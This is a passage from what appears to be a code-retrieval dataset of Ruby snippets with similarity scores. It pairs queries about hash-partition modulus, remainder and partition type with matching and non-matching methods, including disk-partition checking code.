"def values(listed=nil, &filter)\n listed ||= names(&filter)\n listed.collect { |name| load(name) }\n end",
"def values\n @values.values\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n PropertyGroup::PathList.new.import(result[0]),\n PropertyGroup::PathList.new.import(result[1]),\n ]\n end",
"def values\n @ledger.values\n end",
"def list\n @table.keys # values\n end",
"def values\n @values\n end",
"def values\n @values\n end",
"def values\n @values.values\n end",
"def values\n vals = []\n each{|k,v| vals << v}\n vals\n end",
"def values\n @data.values\n end",
"def value_set()\n values = self.values\n values.each { |elt| raise \"not a list! #{elt}\" if !elt.is_a?(Array) and !elt.is_a?(Set) }\n return self.values.reduce(Set.new) { |sum,nex| sum | nex }\n end",
"def values\n fields.map { |f| f.value }\n end",
"def sections\n self.entries.select { |e| e.is_a?(ListSection) }\n end",
"def active_value_list\n @value_lists[@active_value_list_identifier]\n end",
"def ordered_values; end",
"def get_list\n\n @context.storage.get_configuration('participant_list') ||\n { 'type' => 'configurations',\n '_id' => 'participant_list',\n 'list' => [] }\n end",
"def resource_records\n if !@value.nil?\n @value.map { |v| { value: v } }\n end\n end",
"def list=(value)\n @list = value\n end",
"def list\n return @list\n end",
"def entries\n @list\n end",
"def values\n rows.map{|r| r.value}\n end",
"def values\n\n self.to_h.values\n end",
"def list\n @@list\n end",
"def partitions\n topics.values.flat_map(&:partitions)\n end",
"def selected_values &block\n ar = []\n selected_rows().each do |i|\n val = @list[i]\n if block_given?\n yield val\n else\n ar << val\n end\n end\n return ar unless block_given?\n end",
"def values\n @store.all_values\n end",
"def list\n return @lists\n end",
"def shared_list_values\n list_value_custom_fields_enabled_on_project = CustomField.enabled_on_project(self).where(:field_format => 'project_list_value')\n\n if new_record?\n ::ProjectEnumeration.\n joins(:project).\n preload(:project, :custom_field).\n for_list_values.\n where(\"#{Project.table_name}.status <> ? AND #{::ProjectEnumeration.table_name}.sharing = 'system'\", ::Project::STATUS_ARCHIVED).\n where(:custom_field_id => list_value_custom_fields_enabled_on_project).\n order_by_custom_field_then_position\n else\n @shared_list_values ||= begin\n r = root? ? self : root\n ::ProjectEnumeration.\n joins(:project).\n preload(:project, :custom_field).\n for_list_values.\n where(\"#{Project.table_name}.id = #{id}\" +\n \" OR (#{Project.table_name}.status <> #{::Project::STATUS_ARCHIVED} AND (\" +\n \" #{::ProjectEnumeration.table_name}.sharing = 'system'\" +\n \" OR (#{Project.table_name}.lft >= #{r.lft} AND #{Project.table_name}.rgt <= #{r.rgt} AND #{::ProjectEnumeration.table_name}.sharing = 'tree')\" +\n \" OR (#{Project.table_name}.lft < #{lft} AND #{Project.table_name}.rgt > #{rgt} AND #{::ProjectEnumeration.table_name}.sharing IN ('hierarchy', 'descendants'))\" +\n \" OR (#{Project.table_name}.lft > #{lft} AND #{Project.table_name}.rgt < #{rgt} AND #{::ProjectEnumeration.table_name}.sharing = 'hierarchy')\" +\n \"))\").\n where(:custom_field_id => list_value_custom_fields_enabled_on_project).\n order_by_custom_field_then_position\n end\n end\n end",
"def entries\n ary = []\n self.each{|*val|\n # __svalue is an internal method\n ary.push val.__svalue\n }\n ary\n end",
"def values(except: [])\n return nil unless pivot.is_a?(Array) && pivot.present?\n\n params = search_state.params\n # values should have at most one terminal blank pivot\n pivot_values = pivot.map { |k| Array(params.dig(:f, k)) || STOP_VALUE }\n pivot_values = pivot_values[0..(pivot_values.index(STOP_VALUE) || -1)]\n # put an explicit nil in for the matrix\n pivot_values[-1] = [nil] if pivot_values.last == STOP_VALUE\n top_level_values = pivot_values.shift\n return [] if top_level_values.first.blank?\n\n pivot_values.each { |pivot_value| pivot_value[0] ||= nil }\n matrix_values = top_level_values.product(*pivot_values)\n matrix_values.map do |vals|\n PivotValue.new(value: vals.shift, fq: pivot[1..].map(&:to_sym).zip(vals).to_h)\n end\n end",
"def init_value_list \n unless @value_list.nil?\n @value_list = manager_send(:GetValueListItems, self)\n end\n end",
"def _values\n _data.merge(kept_data)\n end",
"def list_data\n _check_and_get(@_data, Array)\n end",
"def values\n @hash.values\n end",
"def values\n if node_type == :leaf\n [payload]\n else\n payload.values\n end\n end",
"def get_list_items\n get_field_config['items']\n end",
"def values\n @hash.values\n end",
"def values\n @values ||= MapscriptEnumerable.new(self, :numvalues, :getValue)\n end",
"def acquire_element_array_list\n element_array_list = []\n (0..7).each do |number|\n element_file_name = ELEMENT_FILE_PREFIX + number.to_s + TEXT_FILE_SUFFIX\n element_array = File.read(element_file_name)\n element_array_list[number] = element_array.split(EXPORT_LIST_SEPARATOR)\n end\n element_array_list\n end",
"def index\n @value_lists = ValueList.all\n end",
"def index\n @list_values = ListValue.all\n end",
"def available_values\n result = []\n for i in (0 .. @tag.length - 1)\n result << @tag[i].value\n end\n return result\n end",
"def available_values\n result = []\n for i in (0 .. @tag.length - 1)\n result << @tag[i].value\n end\n return result\n end",
"def list\n @list\n end",
"def returnList\n\t\telements = []\n\t\tcurrent = @head\n\t\twhile current != nil\n\t\t\telements << current.value\n\t\t\tcurrent = current.nnode\n\t\tend\n\t\treturn elements\n\tend",
"def values_array\n @_field_path.map{ |field_| @_values[field_.name] }\n end",
"def values\n @heap.values\n end",
"def collect\n [@range_low, @range_high]\n end",
"def lists\n @lib.lists\n end",
"def get_values()\n\t\t\treturn @config.values\n\t\tend",
"def list\n @list ||= []\n end",
"def list\n @list ||= []\n end",
"def hash\n lists.inject({}){ |hash, p| hash[p[0]] ||= []; hash[p[0]] << p[1]; hash }\n end",
"def list\n @List\n end",
"def all\n new_list = self.class.new\n origins.each do |origin|\n origin.items.each do |item, int_value|\n new_list.list[item] = int_value\n end\n end\n\n new_list\n end",
"def values\n self.map('lambda{|(_, value)| value}')\n end",
"def print_layout_water_content_list_items\n [{ code: :naturally_occurring, lookup: true },\n { code: :naturally_occurring_percentage, when: :naturally_occurring?, is: [true] },\n { code: :waste_percentage },\n { code: :added_water_percentage }]\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def values(range = nil)\n result_unflatten = if !::RANGES_JRUBY_BUG\n map { |x| x.v }\n else\n self.v\n end\n result = result_unflatten.flatten\n if range\n relevant_result = []\n result.each_with_index { |row_or_column, i| relevant_result << row_or_column if range.include?(i) }\n relevant_result\n else\n result\n end\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def data_values\n if bare_data_set?\n [data]\n else\n data.map{ |set| set.is_a?(Hash) ? set[:values] : set }\n end\n end",
"def values\n @children\n end",
"def values; distinct_values.map(&:value).compact; end",
"def partition_types_ext\n ptr1 = MemoryPointer::new( :size_t, 1)\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, 0, nil, ptr1)\n error_check(error)\n ptr2 = MemoryPointer::new( ptr1.read_size_t )\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, ptr1.read_size_t, ptr2, nil)\n error_check(error)\n arr = ptr2.get_array_of_cl_device_partition_property_ext(0, ptr1.read_size_t/ OpenCL.find_type(:cl_device_partition_property_ext).size)\n arr.reject! { |e| e == 0 }\n return arr.collect { |e| PartitionEXT::new(e.to_i) }\n end",
"def property_list(name, type, required, description = nil, allowed_values = [], hash = {})\n hash.merge!({allowable_values: {value_type: \"LIST\", values: allowed_values}})\n property(name, type, required, description, hash)\n end",
"def values(include_deleted = false)\n include_deleted && @values || (@values.select { |v| !v.deleted? })\n end",
"def fields #:nodoc:\n f = @properties.to_a\n last = f.pop\n f.push @elements\n f.push last\n end",
"def parts\n @parts\n end"
] |
[
"0.6419158",
"0.5873987",
"0.5651121",
"0.5589368",
"0.5561751",
"0.5551433",
"0.554591",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.55264807",
"0.5521307",
"0.54976195",
"0.54662544",
"0.5450633",
"0.54149896",
"0.5413755",
"0.5413755",
"0.5388153",
"0.53491133",
"0.53288317",
"0.5322811",
"0.52833897",
"0.5268636",
"0.52580714",
"0.5255133",
"0.5244333",
"0.52378505",
"0.5226306",
"0.52195835",
"0.52187645",
"0.52143943",
"0.5200189",
"0.5198643",
"0.5198643",
"0.5188169",
"0.5188129",
"0.51865566",
"0.5173547",
"0.5166076",
"0.51610625",
"0.5141641",
"0.5128332",
"0.5124649",
"0.51228225",
"0.5114901",
"0.5108269",
"0.5107722",
"0.5085095",
"0.50758445",
"0.50695616",
"0.50682926",
"0.5063489",
"0.5057818",
"0.50320923",
"0.50213444",
"0.5020547",
"0.5005196",
"0.50046855",
"0.50013435",
"0.4996651",
"0.49959522",
"0.49877143",
"0.49666888",
"0.495004",
"0.49388355",
"0.49291036",
"0.4926703",
"0.492404",
"0.49182183",
"0.49182183",
"0.4917392",
"0.49158925",
"0.48914507",
"0.48751768",
"0.4874845",
"0.48699397",
"0.4864632",
"0.4855787",
"0.4855787",
"0.48534164",
"0.48495165",
"0.484134",
"0.48326117",
"0.4828888",
"0.4826976",
"0.48238543",
"0.48158768",
"0.481189",
"0.48114213",
"0.4777057",
"0.47753403",
"0.47746727",
"0.47672638",
"0.47633964",
"0.4762562"
] |
0.48294732
|
88
|
The modulus and remainder to use for this partition for a hash partition.
|
def hash_values
[@modulus, @remainder]
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def modulo(p0) end",
"def modulus(v)\n @modulus = v\n end",
"def remainder(val); end",
"def modulo(other)\n self % other\n end",
"def remainder(p0) end",
"def modulus\n distance_to(origin)\n end",
"def divmod(p0) end",
"def mod(first_number, second_number)\n first_number % second_number\nend",
"def divmod(val); end",
"def my_modulo(dividend, divisor)\r\n # your code goes here\r\n # use of modulo operator\r\n\r\n dividend % divisor\r\nend",
"def modulo(other)\n Modulo.new(self, other)\n end",
"def modulo_of(fraction); end",
"def modulo(arg0)\n end",
"def modulo(arg0)\n end",
"def get_remainder(num1,num2)\n num1%num2\nend",
"def modulus\n\tputs (5%3)\n\tputs ( -5 % 3)\n\tputs (5 % 3)\n\tputs (-5 % -3)\n\nend",
"def modulo(dividend, divisor)\n puts \"#{dividend} % #{divisor} = #{dividend.modulo(divisor)}\\n\"\nend",
"def mod(n, m)\n return ((n % m) + m) % m\nend",
"def modulus(d, e)\n puts \"MODULUS #{d} % #{e}\"\n return d % e\nend",
"def mod11(number); end",
"def rehash(oldhash, size)\n (oldhash + 1) % size\n end",
"def remainder(v)\n @remainder = v\n end",
"def mod(num1, num2)\n num2.to_f % num1.to_f;\nend",
"def hashfunction(key, size)\n #key.hash % size\n key % size\n end",
"def modular_function\n num_1 % num_2\n return num_1 % num_2\nend",
"def kidmod10(base); end",
"def hash\n excl = @excl ? 1 : 0\n hash = excl\n hash ^= @begin.hash << 1\n hash ^= @end.hash << 9\n hash ^= excl << 24;\n # Are we throwing away too much here for a good hash value distribution?\n return hash & Fixnum::MAX\n end",
"def divmod(arg0)\n end",
"def divmod(arg0)\n end",
"def calculate_hash(input, prep_hashes)\n result = 0\n input.unpack('U*').each do |x|\n result += prep_hashes.hash(x)\n end\n (result % MOD_VALUE).to_s(HEX)\nend",
"def saveThePrisoner(n, m, s)\n mod = (m % n == 0) ? n : (m % n)\n return ((mod + s -1) % n == 0) ? n : (mod + s -1) % n\n\nend",
"def position(x) #x will be the Hashable object\r\n return x.hashvalue % @size\r\n end",
"def divisor_plus_remainder(big_int, small_int)\n big_int / small_int + big_int % small_int\nend",
"def saveThePrisoner(n, m, s)\n res = ((m - 1) + s) % n\n res == 0 ? n : res \nend",
"def mod(a, b)\n a % b\n c = a % b\n puts \" the remainder of #{a} divided by #{b} is #{c}\"\nreturn c\nend",
"def remainder(arg0)\n end",
"def modulo(y)\n mod(y, ZERO)\n end",
"def hash_this(word)\n\t\tdigest = Digest::MD5.hexdigest(word) # get the hex version of the MD5 for the specified string\n\t\tdigest[@offset, @digits].to_i(16) % @max_value # offset it using the initial seed value and get a subset of the md5. then modulo it to get the bit array location\n\tend",
"def index(key, size)\n return key.sum % size \n end",
"def index(key, size)\n return key.sum % size\n end",
"def inverse_modulo(n)\n\t\treturn nil unless self.gcd(n) == 1\n\t\t(n.extended_gcd(self).last) % n\n\tend",
"def inv_mod x,n\n d,r,s = gcd2 x,n\n if d==1\n r % n\n else\n 0\n end\nend",
"def index(key, size) #take the asscii value % size to come up with index\n total = 0\n key.each_byte do |c|\n total = c + total\n end\n total % size\n\n end",
"def mod\n x, y = stack.pop(2)\n push x % y\n end",
"def calculate_random_partitioner_token(key)\n number = Digest::MD5.hexdigest(key).to_i(16)\n\n if number >= (2**127)\n # perform two's complement, basically this takes the absolute value of the number as\n # if it were a 128-bit signed number. Equivalent to Java BigInteger.abs() operation.\n result = (number ^ (2**128)-1) + 1\n else\n # we're good\n result = number\n end\n\n result\n end",
"def division_plus_remainder(big_number, small_number)\n (big_number / small_number) + (big_number % small_number)\n end",
"def index(key, size)\n # Look into this. Same as previous ???\n # Review the base of tens to get a better understanding.\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def H(n, *a)\n nlen = 2 * (((n.to_hex_string).length * 4 + 7) >> 3)\n hashin = a.map {|s|\n next unless s\n shex = s.class == String ? s : s.to_hex_string\n if shex.length > nlen\n raise 'Bit width does not match - client uses different prime'\n end\n '0' * (nlen - shex.length) + shex\n }.join('')\n sha512_hex(hashin).hex % n\n end",
"def index(key, size)\n #true_index = hash(key) % k\n code = 0\n key.split(%r{\\s*}).each do |letter|\n code += letter.ord \n end\n puts code\n return code % size\n\n end",
"def my_remainder(a, b)\n\treturn nil if a == 0 || b == 0\n\treturn a.abs % b.abs if a.abs >= b.abs\n\treturn b.abs % a.abs if b.abs > a.abs\nend",
"def hash\r\n a = 0\r\n @id.each_byte {|c| a += c.to_i}\r\n (a + @paired.to_i) * HASH_PRIME\r\n end",
"def modulo(x, y)\n if y == 0\n return \"Psst. You can't divide by zero. Please try again.\"\n else\n return x % y\n end\nend",
"def is_divisible_using_hashing(arr, k)\n n = arr.length\n hsh = {}\n # collect reminders and their occurences\n for i in 0...n\n if hsh[arr[i] % k]\n hsh[arr[i] % k] += 1\n else\n hsh[arr[i] % k] = 1 \n end \n end\n\n # traverse array again to check reminders with following possiblities\n # 1. if reminder is 0, then its occurence must be > 1\n # 2. if reminder divides k in two halves, then its occurence must be > 1\n # 3. if reminder occurence is same as k - reminder occurence\n\n for i in 0...n\n rem = arr[i] % k\n if rem * 2 == k || rem == 0\n if hsh[rem] == 1\n return false\n end \n else\n if hsh[rem] != hsh[k-rem]\n return false\n end \n end \n end \n true\nend",
"def p003(total_remaining = 600_851_475_143)\n divisor = 2\n until divisor >= total_remaining\n if (total_remaining % divisor).zero?\n total_remaining /= divisor\n else\n divisor += 1\n end\n end\n divisor\nend",
"def modulus(a, b)\n return \"If you divide #{a} and #{b} you will get the remainer #{a%b}.\"\nend",
"def mod(signal)\n self.class.new(self, signal) { |a, b| a % b }\n end",
"def magic_alignement()\n\t\tdt = @buswi[0][0]\n\t\tokb = [@buswi[0]]\n\n\t\tremb = @buswi[1..].clone\n\t\tt=0\n\t\tloop do \n\t\t\tt = t + dt\n\t\t\tokb=[]\n\t\t\tremb.each do |p,i|\n\t\t\t\tif (t+i)%p == 0\n\t\t\t\t\tdt = dt.lcm(p)\n\t\t\t\t\tokb << [p,i]\n\t\t\t\tend\n\t\t\tend\n\t\t\tremb = remb - okb\n\t\t\tbreak if remb.empty?\n\t\tend\n\t\tt\n\tend",
"def index(key, size)\n i = key.sum % size \n end",
"def get_lh_hash(key)\n res = 0\n key.upcase.bytes do |byte|\n res *= 37\n res += byte.ord\n end\n return res % 0x100000000\n end",
"def s1 num\n\tnum % 2\nend",
"def div_h_p_nr(a,b)\n p = 0\n\n @bits.times do\n if p < 0\n # (i-a) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-a) p=p+b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p += b\n else\n # (i-b) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-b) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n# Tests pass if the following is uncommented\n# # (iv) restore p\n# p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n end\n # FIXME - need a test case that exercises this last step\n if p < 0\n p += b\n end\n [lo(a),lo(p)]\n end",
"def hash\n num = @high << 64\n num |= @low\n num.hash\n end",
"def __remainder=(v) # only keep relevant bits of the remainder\n if v != 0\n num_bits = self.class.type.size * 8\n num_used_bits = self.class.map.value.collect { |v, _, _| v }.select { |v| v > 0 }.sum(:+)\n if num_used_bits < num_bits\n v &= ((( 1 << (num_bits - num_used_bits)) - 1) << num_used_bits)\n else\n v = 0\n end\n end\n @__remainder = v\n end",
"def remainder(y)\n z = modulo(y)\n if !z.zero? && ((self < 0 && y > 0) || (self > 0 && y < 0))\n z - y\n else\n z\n end\n end",
"def s1 number\n number % 2\nend",
"def index(key, size)\n return key.sum%size\n end",
"def index(key, size)\n total_sum = 0\n key.each_byte do |x|\n total_sum += x\n end\n return total_sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def index(key, size)\n key.sum % size \n end",
"def index(key, size)\n key.sum % size \n end",
"def get_hash(str, elem_num)\n tmp = 0\n s = str.unpack(\"C*\")\n for i in 1..s.size\n tmp += s[i-1]\n end\n return tmp % elem_num\n end",
"def pc_int_inv(a,mod=12)\n return (12-a)%mod\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end"
] |
[
"0.6920085",
"0.6797567",
"0.674929",
"0.6711626",
"0.66135556",
"0.6557639",
"0.6499426",
"0.6435647",
"0.64005387",
"0.6293782",
"0.61620873",
"0.61104375",
"0.60770786",
"0.60770786",
"0.6060377",
"0.6050155",
"0.6028834",
"0.60186404",
"0.6014417",
"0.5994006",
"0.59627205",
"0.5954547",
"0.59105915",
"0.58995056",
"0.5867977",
"0.58317673",
"0.57877356",
"0.57697755",
"0.57697755",
"0.57475424",
"0.574595",
"0.57198334",
"0.5694534",
"0.5674358",
"0.56653774",
"0.56248045",
"0.56200635",
"0.5605526",
"0.56038576",
"0.55959046",
"0.5593711",
"0.55884653",
"0.558231",
"0.5574421",
"0.5562271",
"0.5555954",
"0.55487907",
"0.55352855",
"0.55352855",
"0.55352855",
"0.55352855",
"0.5528424",
"0.55100906",
"0.5508569",
"0.55060786",
"0.5502757",
"0.5501668",
"0.5482544",
"0.54785997",
"0.5478472",
"0.54517716",
"0.54505527",
"0.54359984",
"0.54349226",
"0.5431876",
"0.5426708",
"0.5424879",
"0.5416197",
"0.54006267",
"0.5396558",
"0.5388633",
"0.5384729",
"0.5381226",
"0.53789884",
"0.53789884",
"0.5377594",
"0.5363653",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212",
"0.5355212"
] |
0.6458688
|
7
|
Determine the appropriate partition type for this partition by which methods were called on it.
|
def partition_type
raise Error, "Unable to determine partition type, multiple different partitioning methods called" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1
if @from || @to
raise Error, "must call both from and to when creating a partition of a table if calling either" unless @from && @to
:range
elsif @in
:list
elsif @modulus || @remainder
raise Error, "must call both modulus and remainder when creating a partition of a table if calling either" unless @modulus && @remainder
:hash
elsif @default
:default
else
raise Error, "unable to determine partition type, no partitioning methods called"
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def IsPartitionable(entry)\n entry = deep_copy(entry)\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMRAID ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMMULTIPATH ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_MDPART ||\n IsRealDisk(entry)\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def get_filetype(partition) # by nelsongs\n\treturn `file -s \"#{partition}\" | awk '{print $2}'`.chomp\nend",
"def partition_types_ext\n ptr1 = MemoryPointer::new( :size_t, 1)\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, 0, nil, ptr1)\n error_check(error)\n ptr2 = MemoryPointer::new( ptr1.read_size_t )\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, ptr1.read_size_t, ptr2, nil)\n error_check(error)\n arr = ptr2.get_array_of_cl_device_partition_property_ext(0, ptr1.read_size_t/ OpenCL.find_type(:cl_device_partition_property_ext).size)\n arr.reject! { |e| e == 0 }\n return arr.collect { |e| PartitionEXT::new(e.to_i) }\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def disk_type\n return @disk_type\n end",
"def partition_of_nodename node\n @nodes.each do |k,v|\n return v[StatPartition].to_i if k == node\n end\n return nil\n end",
"def FSCKPartition(partition)\n if !Mode.test\n detected_fs = Storage.DetectFs(partition)\n if detected_fs == :ext2\n # label, %1 is partition\n out = Builtins.sformat(_(\"Checking partition %1\"), partition)\n UI.OpenDialog(Opt(:decorated), Label(out))\n\n Builtins.y2milestone(\"command: /sbin/e2fsck -y %1\", partition)\n SCR.Execute(\n path(\".target.bash\"),\n Ops.add(\"/sbin/e2fsck -y \", partition)\n )\n\n UI.CloseDialog\n end\n end\n\n nil\n end",
"def get_pt_type(device)\n fs_check = Mixlib::ShellOut.new(\"blkid -c /dev/null #{device}\")\n fs_check.run_command\n match = fs_check.stdout.match(/\\sPTTYPE=\\\"(.*?)\\\"/)\n match = '' if match.nil?\n\n Chef::Log.info(\"Partition type for device #{device}: #{match[1]}\")\n match[1]\nend",
"def partition_list()\nend",
"def isPartition(partition)\n partition = deep_copy(partition)\n AutoinstCommon.isValidObject(@fields, partition)\n end",
"def CheckPartition(partition)\n partition = deep_copy(partition)\n freshman = {\n :valid => false,\n :name => \"unknown\",\n :arch => \"unknown\",\n :label => Ops.get_string(partition, \"label\", \"\"),\n :fs => Ops.get_symbol(partition, \"detected_fs\", :unknown),\n :fstype => Ops.get_string(partition, \"fstype\", \"unknown\")\n }\n\n p_dev = Ops.get_string(partition, \"device\", \"error\")\n p_fsid = Ops.get_integer(partition, \"fsid\", 0)\n p_type = Ops.get_symbol(partition, \"type\", :primary)\n p_detect_fs = Ops.get_symbol(partition, \"detected_fs\", :unknown)\n\n # possible root FS\n if Builtins.contains(FileSystems.possible_root_fs, p_detect_fs)\n mt_map = {\n :ext2 => \"ext2\",\n :ext3 => \"ext3\",\n :ext4 => \"ext4\",\n :btrfs => \"btrfs\",\n :reiser => \"reiserfs\",\n :xfs => \"xfs\",\n :jfs => \"jfs\"\n }\n mount_type = Ops.get(mt_map, p_detect_fs, \"\")\n\n error_message = nil\n if !(\n error_message_ref = arg_ref(error_message);\n _RunFSCKonJFS_result = RunFSCKonJFS(\n mount_type,\n p_dev,\n error_message_ref\n );\n error_message = error_message_ref.value;\n _RunFSCKonJFS_result\n )\n Ops.set(freshman, :valid, false)\n return deep_copy(freshman)\n end\n\n # mustn't be empty and must be modular\n if mount_type != \"\" && !Builtins.contains(@non_modular_fs, mount_type)\n SCR.Execute(path(\".target.modprobe\"), mount_type, \"\")\n end\n # mount (read-only) partition to Installation::destdir\n Storage.RemoveDmMapsTo(p_dev)\n if Convert.to_boolean(\n SCR.Execute(\n path(\".target.mount\"),\n [p_dev, Installation.destdir, Installation.mountlog],\n \"-o ro\"\n )\n )\n # Is this a root partition, does /etc/fstab exists?\n if Ops.greater_than(\n SCR.Read(\n path(\".target.size\"),\n Ops.add(Installation.destdir, \"/etc/fstab\")\n ),\n 0\n )\n Builtins.y2milestone(\"found fstab on %1\", partition)\n\n fstab = []\n crtab = []\n\n fstab_ref = arg_ref(fstab)\n crtab_ref = arg_ref(crtab)\n read_fstab_and_cryptotab(fstab_ref, crtab_ref, p_dev)\n fstab = fstab_ref.value\n crtab = crtab_ref.value\n Update.GetProductName\n\n fstab = Builtins.filter(fstab) do |p|\n Ops.get_string(p, \"file\", \"\") == \"/\"\n end\n\n if Builtins.size(Ops.get_string(fstab, [0, \"spec\"], \"\")) == 0\n Builtins.y2warning(\"Cannot find / entry in fstab %1\", fstab)\n end\n\n Ops.set(\n freshman,\n :valid,\n Ops.greater_than(\n Builtins.size(Ops.get_string(fstab, [0, \"spec\"], \"\")),\n 0\n ) &&\n Storage.DeviceMatchFstab(\n p_dev,\n Ops.get_string(\n # bugzilla #304269\n # DeviceMatchFstab expects _old_ not _translated_ device\n fstab,\n [0, \"spec_old\"],\n Ops.get_string(fstab, [0, \"spec\"], \"\")\n )\n )\n )\n\n # Why this doesn't match?\n # Possible reasons:\n # - /var not mounted so hwinfo cannot translate device names\n if Ops.get_boolean(freshman, :valid, false) != true\n Builtins.y2warning(\n \"Device does not match fstab: '%1' vs. '%2'\",\n p_dev,\n Ops.get_string(fstab, [0, \"spec\"], \"\")\n )\n end\n if Mode.autoinst\n # we dont care about the other checks in autoinstallation\n SCR.Execute(path(\".target.umount\"), Installation.destdir)\n return deep_copy(freshman)\n end\n\n # Get installed release name\n release = OSRelease.ReleaseInformation(Installation.destdir)\n Builtins.y2debug(\"release: %1\", release)\n if release == \"?\"\n # label for an unknown installed system\n release = _(\"Unknown\")\n end\n Ops.set(freshman, :name, release)\n\n # Right architecture?\n Ops.set(\n freshman,\n :arch,\n GetArchOfELF(Ops.add(Installation.destdir, \"/bin/bash\"))\n )\n instsys_arch = GetArchOfELF(\"/bin/bash\")\n\n # `arch_valid, see bugzilla #288201\n # installed /bin/bash and the one from inst-sys are matching\n if Ops.get_string(freshman, :arch, \"unknown\") == instsys_arch\n Builtins.y2milestone(\"Architecture (%1) is valid\", instsys_arch)\n Ops.set(freshman, :arch_valid, true) \n\n # both are PPC, bugzilla #249791\n elsif Builtins.contains(\n [\"ppc\", \"ppc64\"],\n Ops.get_string(freshman, :arch, \"unknown\")\n ) &&\n Builtins.contains([\"ppc\", \"ppc64\"], instsys_arch)\n Builtins.y2milestone(\n \"Architecture for partition %1 is %2, upgrading %3\",\n p_dev,\n Ops.get_string(freshman, :arch, \"unknown\"),\n instsys_arch\n )\n Ops.set(freshman, :arch_valid, true) \n\n # Architecture is not matching\n else\n Builtins.y2milestone(\n \"Architecture for partition %1 is %2, upgrading %3\",\n p_dev,\n Ops.get_string(freshman, :arch, \"unknown\"),\n instsys_arch\n )\n Ops.set(freshman, :arch_valid, false)\n end\n\n # If architecture is not matching, the whole partition is considered to be wrong\n if Ops.get_boolean(freshman, :arch_valid, false) != true\n Builtins.y2milestone(\n \"Architecture is not valid -> the whole partition is not valid\"\n )\n Ops.set(freshman, :valid, false)\n end\n\n if IncompleteInstallationDetected(Installation.destdir)\n Builtins.y2milestone(\n \"Incomplete installation detected, partition is not valid\"\n )\n Ops.set(freshman, :valid, false)\n end\n\n Builtins.y2milestone(\n \"Partition is valid: %1, arch is valid: %2\",\n Ops.get_boolean(freshman, :valid, false),\n Ops.get_boolean(freshman, :arch_valid, false)\n )\n end\n\n # unmount partition\n SCR.Execute(path(\".target.umount\"), Installation.destdir)\n end\n 